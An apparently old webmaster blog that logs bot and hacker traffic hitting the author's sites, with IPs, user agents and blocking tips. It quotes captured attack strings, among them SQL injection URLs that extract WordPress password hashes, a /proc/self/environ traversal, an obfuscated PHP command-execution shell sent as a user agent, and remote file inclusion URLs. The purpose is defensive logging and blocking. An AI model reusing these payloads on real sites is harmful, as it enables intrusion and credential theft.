Web robots are visiting sites to hack, spam, email harvest and to scrap your website contect for profit.
This blog is an atempt to keep track of them and to help webmasters by listing the abuse in google.
Agent: -NO AGENT-
74.52.200.178 wrangler.websitewelcome.com
Just what is this bot. It doesnt have a useragent and the website websitewelcome.com has no info on it just a email contact address.
websitewelcome.com added to the block list
Read more!
Agent: (a href="http://www.ongarofrancesco.org">Independent Security Researcher(/a> Independent Security Researcher(/a>" target=\_BLANK">
79.45.39.47 host47-39-dynamic.45-79-r.retail.telecomitalia.it
This bot tries to spam your useragent logs that some sites post with links to a website at www.ongarofrancesco.org
This looks to be some hacker ref site. The bot is from Italy
This just goes to show why you should not have scripts on your site that displays the useragents that you have logged to the internet. Because they can contain HTML
Read more!
Domain Highlighting in Internet Explorer 8 (IE8) now blanks the subdomain and following text after the domain.
This is nuts it makes this site read blogger.com and you can not see the subdomain who's lamo ideal is this. Its one thing to make the main domain a diff color its another to hide the entire URL.
Someone has to find a way around this must be some way you can higlight the URL bar using java so the subdomain will be visable. Or someway to force IE8 into ie7 mode. We own our subdomains and M$ has no right to blank them out. They are part of our domain names and part of our keywork usage.
This has to be fixed.
Microsoft is taking away our legal use of subdomains.
Websites who use subdomains are not crooks we are legaly using 1 domain to create many websites. Just because some crook used a subdomain they should not be hidden.
Zdnet says IE8 puts dim wits ahead of tech savvy.
aidanwalsh.net says
why do you have to obfuscate the rest of the URL information by default? No part of a URL is irrelevant, and information contained in URLs is becoming more and more relevant as time goes on (logically structured URLs, URL based identity management, etc). Why do I need to hold my mouse over the address bar to be able to see this? Surely there are better ways to emphasise the domain block of the URL? Embolden it. Change the colour of the domain, not the rest of the URL.
mmautoban has detected the following code being used on a WP blog.
Antyone know what this is.
/functionnumber-%20iterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20index%20=%20-number-%20slices%20=%20-%20array%20=%20this.toArray;%20%20%20%20while%20index%20+=%20number%20%20array.length%20%20%20%20%20%20slices.pusharray.sliceindex-%20index+number;%20%20%20%20return%20slices.collectiterator-%20context;%20%20
/functionfilter-%20iterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20results%20=%20;%20%20%20%20if%20Object.isStringfilter%20%20%20%20%20%20filter%20=%20new%20RegExpfilter;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20if%20filter.matchvalue%20%20%20%20%20%20%20%20results.pushiteratorvalue-%20index;%20%20%20%20;%20%20%20%20return%20results;%20%20
/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20result;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20value%20=%20iteratorvalue-%20index;%20%20%20%20%20%20if%20result%20==%20undefined%20%20value%20=%20result%20%20%20%20%20%20%20%20result%20=%20value;%20%20%20%20;%20%20%20%20return%20result;%20%20
/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20result;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20value%20=%20iteratorvalue-%20index;%20%20%20%20%20%20if%20result%20==%20undefined%20%20value%20%20result%20%20%20%20%20%20%20%20result%20=%20value;%20%20%20%20;%20%20%20%20return%20result;%20%20 GET
/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20trues%20=%20-%20falses%20=%20;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20iteratorvalue-%20index%20?%20%20%20%20%20%20%20%20trues%20:%20falses.pushvalue;%20%20%20%20;%20%20%20%20return%20trues-%20falses;%20%20
/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator.bindcontext;%20%20%20%20return%20this.mapfunctionvalue-%20index%20%7B%20%20%20%20%20%20return%20%7Bvalue:%20value-%20criteria:%20iteratorvalue-%20index%7D;%20%20%20%20%7D.sortfunctionleft-%20right%20%7B%20%20%20%20%20%20var%20a%20=%20left.criteria-%20b%20=%20right.criteria;%20%20%20%20%20%20return%20a%20%3C%20b?%20-1%20:%20a%20%20b%20?%201%20:%200;%20%20%20%20.pluckvalue;%20%20
%20null%20:%20fillWith;%20%20%20%20return%20this.eachSlice(number-%20function%20(slice)%20{while%20(slice.length%20%3C%20number)%20{slice.push(fillWith);}return%20slice;});}
It has about 15 other version I suspect it is some type of atack.
Unless some plugin is malfunctioning.
Anyone have any info what this code is?
Read more!
OScommerce Notes
===============
A rare bug has been detected in OScommerce. If the customer does not select a payment at checkout the browser is redirected to
/checkout_payment.php?error_message=Please+select+a+payment+method+for+your+order
This generates a +select+ injection hack detection in mmautoban.
To prevent this error edit your OSCommerce english.php file and change the error statement from
Please Select to Please Pick
this will prevent customers from getting banned.
It is unknown if other such errors exist in other places or other programs.
If you see any please report them.
Read more!
Just detected this hacker. the ip is block by no-more-funn.moensted.dk
What is this useragent? (k1b compatible; rss 6.0; windows sot 5.1 security kol)
www._____.com/index.php?cat=%2527+UNION+SELECT+CONCAT(666-CHAR(58)-user_pass-CHAR(58)-666-CHAR(58))+FROM+wp_users+where+id=1/*
Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol)
58.241.255.38
www._____.com/index.php?cat=999+UNION+SELECT+null-CONCAT(666-CHAR(58)-user_pass-CHAR(58)-666-CHAR(58))-null-null-null+FROM+wp_users+where+id=1/*
Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol)
58.241.255.38
www._____.com/wp-trackback.php?p=1
Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol)
58.241.255.38
www.____.com/xmlrpc.php
Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol)
58.241.255.38
Read more!
Baby hacker has moved to http://babycaleb.mvhosted.com
And his baby bots are now trying to inject this new url into websites.
The site when inspected using Spam Spade to avoid any virus infection shows the exploit is in the html just like before.
A search shows its infected many websites. http://www.google.com
Parsing input: http://babycaleb.mvhosted.com
Host babycaleb.mvhosted.com (checking ip) = 74.53.187.178
host 74.53.187.178 = picsfolio.com.187.53.74.in-addr.arpa (cached)
Host babycaleb.mvhosted.com (checking ip) = 74.53.187.178
host 74.53.187.178 = picsfolio.com.187.53.74.in-addr.arpa (cached)
Routing details for 74.53.187.178
[refresh/show] Cached whois for 74.53.187.178 : abuse@theplanet.com
Using abuse net on abuse@theplanet.com
abuse net theplanet.com = abuse@theplanet.com
Using best contacts abuse@theplanet.com
Send abuse messages to theplanet.com
Read more!
208.43.85.166
Required header 'Accept' missing GET / HTTP/1.0
User-Agent: Mozilla/5.0 (compatible; itsapic.com_crawler/0.01 +http://itsapic.com/crawler.html; crawler@itsapic.com)
Connection: close
Referer: http://u.webring.com/hub?ring=xxxxxxxxxxxxxxxx
This bot was scanning webing looking for sites and got blocked by BB so watch for it.
Website does not tell what its doing or ask permission to enter your site.
add to robots
User-agent: itsapic.com_crawler
Disallow: /
Read more!
Am getting a lot of these request lately
/shop/catalog/product_info.php?cPath=http://babycaleb.fortunecity.co.uk/index.htm
They are from lots of IPS all trying to remote load this page. Inside that page is a hack atempt. AVG gives an alarm if you try to view the source.
Do not go to the website babycaleb.fortunecity.co.uk AVG detects a virus but it still gets into your system. Look for ..
c:\windows\system32\tools\regexe.exe
a trojan horse downloader.generic8.cox
--updated-
The site has now been shutdown.
A search of google
http://www.google.com/search?q=babycaleb.fortunecity.co.uk shows that sites all over the net are infected with this atack and they are allowing the atack to spread. Perhaps they are involved in the atack?
Read more!
serverkompetenz.net is a hacker not a spambot.
.com/nuke/index.php?k=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ GET HTTP/1.1
Agent:
$x0e="\145x\x65\x63"; $x0f="\x66eo\146"; $x10="\x66\x72ea\x64"; $x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73"; $x12="i\163\x5f\162\x65s\157ur\x63\x65"; $x13="\152\157\x69\156"; $x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73"; $x15="ob\137\x65\156d\137\x63lea\156"; $x16="\x6fb_st\x61\x72\164"; $x17="\x70\141\163s\164\x68\162\165"; $x18="\x70\143\154ose"; $x19="p\157\160e\x6e"; $x1a="\163h\145\154l\137\x65\170e\143"; $x1b="\x73\x79s\x74e\x6d"; function x0b($x0b){ global $x0e-$x0f-$x10-$x11-$x12-$x13-$x14-$x15-$x16-$x17-$x18-$x19-$x1a-$x1b; $x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b-$x0c);$x0c = $x13("\n"-$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b-"\x72"))){ $x0c = ""; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d-1024); } @$x18($x0d);} } return $x0c;}echo x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");The latest hack running right now is a injection atempt using a string like this.
DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C----removed----%20AS%20CHAR(4000));EXEC(@S);
This is a bot atack and is comming from everywhere.
The come in 2 at a time from the same IP.
They are trying to inject some code into your site to display a iframe that will take people to another site. It doesnt look like they are atacking PHP they are atacking ASP Cold Fusion and Perl See more here isc.sans.org
Also see this post which recomends.
RewriteCond %{REQUEST_URI} ^(.*)CAST(.*) [OR]
RewriteCond %{REQUEST_URI} ^(.*)DECLARE(.*) [NC,OR]
But a better page on how to block this by .htaccess is located here.
They are also scanning for a delay in page return so any script that sleeps when it detects a hack must have the sleep removed or they will come back and hit you harder.
Just the hits will bring you server down if you try to ban all the IPS being used so I have modified the hacker modules.
Update hacker modules Here.
You will also want to download your databases and scan them for IFRAMES and java script.
Read more!
Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 2.0.50727; .net clr 1.1.4322)
64.91.248.2 magnum.liquidweb.com
string=[ feed=http%3A%2F%2Fchyngachanga.ru%2Fcontent%2Fwuge%2Fowofi%2F ]
hacker hits with this string trying to get my server to run his scripts.
then after geting banned keeps trying with this set of scripts.
?feed=http%3A%2F%2Fwww.qubestunes.com%2Ftreytest%2F1%2Fadoyuru%2Fzagu%2F
p=http%3A%2F%2Fwww.heaven-house.kz%2Ftemplates_c%2Fomoj%2Femuqir%2F
they all are scripts used by hackers to display a test message on your server
http://chyngachanga.ru/content/wuge/owofi/
http://www.qubestunes.com/treytest/1/adoyuru/zagu/
http://www.heaven-house.kz/templates_c/omoj/emuqir/
Read more!
After banning the domain amazonaws.com because they are hosting bots.
I get all of this.
Agent: webclient
75.101.206.181 ec2-75-101-206-181.compute-1.amazonaws.com
Agent: webclient
75.101.206.181 ec2-75-101-206-181.compute-1.amazonaws.com
Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322)
67.202.31.132 ec2-67-202-31-132.compute-1.amazonaws.com
Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322; .net clr 2.0.50727)
67.202.31.132 ec2-67-202-31-132.compute-1.amazonaws.com
Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322)
67.202.57.15 ec2-67-202-57-15.compute-1.amazonaws.com
Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322; .net clr 2.0.50727)
67.202.57.15 ec2-67-202-57-15.compute-1.amazonaws.com
Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322; .net clr 2.0.50727)
67.202.57.15 ec2-67-202-57-15.compute-1.amazonaws.com
Agent: Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com-crawl@powerset.com]
72.44.49.121 ec2-72-44-49-121.z-1.compute-1.amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
67.202.34.44 ec2-67-202-34-44.compute-1.amazonaws.com
-----Update AideRSS just does not get it that they have been blocked.
67.202.23.122 ec2-67-202-23-122.compute-1.amazonaws.com
[06-17-2008-16:07:52] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
75.101.226.160 ec2-75-101-226-160.compute-1.amazonaws.com
[06-17-2008-16:09:04] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
75.101.219.174 ec2-75-101-219-174.compute-1.amazonaws.com
[06-17-2008-16:09:19] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
67.202.21.42 ec2-67-202-21-42.compute-1.amazonaws.com
[06-17-2008-16:09:22] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
67.202.23.83 ec2-67-202-23-83.compute-1.amazonaws.com
[06-17-2008-16:09:29] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
75.101.211.7 ec2-75-101-211-7.compute-1.amazonaws.com
[06-17-2008-16:09:35] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
75.101.244.65 ec2-75-101-244-65.compute-1.amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
67.202.61.94 ec2-67-202-61-94.compute-1.amazonaws.com
Update
67.202.31.132 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.61.94 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.23.83 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.21.42 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.23.122 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.34.44 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.57.15 is BLACKLISTED by dnsbl.njabl.org for spam
The following comment is associated with this record: This network is a member of a dynamic hosting environment. See http://ec2.amazonaws.com/
It was added to the list: Tue Apr 1 12:41:39 2008 EST
spam source means the system was found via manual spam header parsing to be the origin of spam.
update july 15th
Agent: firefox/2.0.0.6 (ubuntu-feisty)
72.44.48.95 ec2-72-44-48-95.compute-1.amazonaws.com
Read more!
Have started expermental tracking of the AVG bandwidth hog (malware)
Tracking logs show that each user loads a page 3 to 6 times last one atacked my system 23 times.
The following users were caught running this abusive bot. Users running this
bot are warned that it conducts a DOS atack on websites that they view on a google page and that they are in violation of ISP abuse rules by running it.
It also causes your computer to visit ever site on the google pages including porno so they may get in trouble at work for using this thing.
218.111.223.48 06-24-2008-18:45:45 48.223.111.218.kmr03-home.tm.net.my AVG _ _ 3
74.12.128.183 06-24-2008-19:14:03 74.12.128.183 AVG _ _ 6
67.32.230.107 06-24-2008-20:21:05 adsl-32-230-107.bct.bellsouth.net AVG _ _ 3
64.150.130.236 06-24-2008-20:42:24 236.64-150-130-net.sccoast.net AVG _ _ 3
74.197.112.161 06-24-2008-22:20:52 74.197.112.161 AVG _ _ 6
98.224.47.121 06-24-2008-23:22:42 c-98-224-47-121.hsd1.fl.comcast.net AVG _ _ 3
71.3.48.53 06-24-2008-23:51:47 fl-71-3-48-53.dhcp.embarqhsd.net AVG _ _ 3
124.179.217.189 06-24-2008-23:56:19 CPE-124-179-217-189.vic.bigpond.net.au AVG _ _ 3
24.57.41.30 06-25-2008-01:49:43 d57-41-30.home.cgocable.net AVG _ _ 2
85.104.112.83 06-25-2008-07:11:37 dsl85-104-28755.ttnet.net.tr AVG _ _ 3
213.55.74.13 06-25-2008-07:38:17 213.55.74.13 AVG _ _ 3
24.14.133.88 06-25-2008-12:46:30 c-24-14-133-88.hsd1.il.comcast.net AVG _ _ 3
200.97.12.91 06-25-2008-12:49:01 200.97.12.91 AVG _ _ 6
74.138.198.171 06-25-2008-13:56:31 74-138-198-171.dhcp.insightbb.com AVG _ _ 6
76.67.42.200 06-25-2008-15:47:47 bas21-toronto12-1279470280.dsl.bell.ca AVG _ _ 23
Read more!
AVG users using site search are setting off bot alarms and
bad-behavior s rejecting the visitors.
The bot visits every page you see on a search page and tries to scan them.
This is overloading everyones servers and BB detects it because its a broken bot that has incorrect headers.
Once blocked by BB if logging is turned on the user will be unable to visit the site and will get a error.
Worse yet AVG doesnt understand the error page BB sends and reports the site as safe making the scanner useless because all a hacker has to do is display a safe page to AVG.
So if you want to block this BB will do it so will my script. But if your running a blog and you dont want the visitors blocked you need to turn off logging.
Users running MMAUTOBAN download the upgrade
Read more!
